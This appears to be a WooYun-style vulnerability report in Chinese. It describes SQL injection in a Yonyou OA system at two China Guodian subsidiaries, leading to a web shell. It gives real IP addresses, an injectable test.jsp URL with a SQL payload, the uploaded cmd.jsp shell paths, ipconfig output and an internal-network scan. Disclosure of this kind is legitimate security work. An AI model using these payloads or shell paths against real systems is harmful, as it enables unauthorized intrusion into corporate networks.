中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

https://60.13.13.239:8080/yyoa/
https://60.13.13.239:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20database()
序号 @@basedir
1 D:\Program Files\UFseeyon\OA\mysql\bin\..\
具体拿shell方法见
 WooYun: 东方航空传媒公司一个被忽略漏洞引发的血案(可getshell)
得到shell
https://60.13.13.239:8080/yyoa/wel.jsp
https://60.13.13.239:8080/yyoa/cmd.jsp

ipconfig
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::50fc:d4c8:8aee:b822%11
   IPv4 地址 . . . . . . . . . . . . : 10.100.130.5
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.100.130.254
传了一个内网扫描的jsp代理
https://10.100.130.4 >> >>Apache-Coyote/1.1 >>Success
https://10.100.130.5 >> IIS7>>Microsoft-IIS/7.5 >>Success
https://10.100.130.11 >> >>Microsoft-IIS/6.0 >>Success
https://10.100.130.12 >> >>Microsoft-IIS/6.0 >>Success
https://10.100.130.6 >> ���>>Apache >>Success
https://10.100.130.101 >> ���>>Apache >>Success
https://10.100.130.253 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success
https://10.100.130.252 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success
一些内部文档信息和log


https://222.89.154.134:8080/yyoa/
shell地址:https://222.89.154.134:8080/yyoa/cmd.jsp

解决方案:
升级程序,打补丁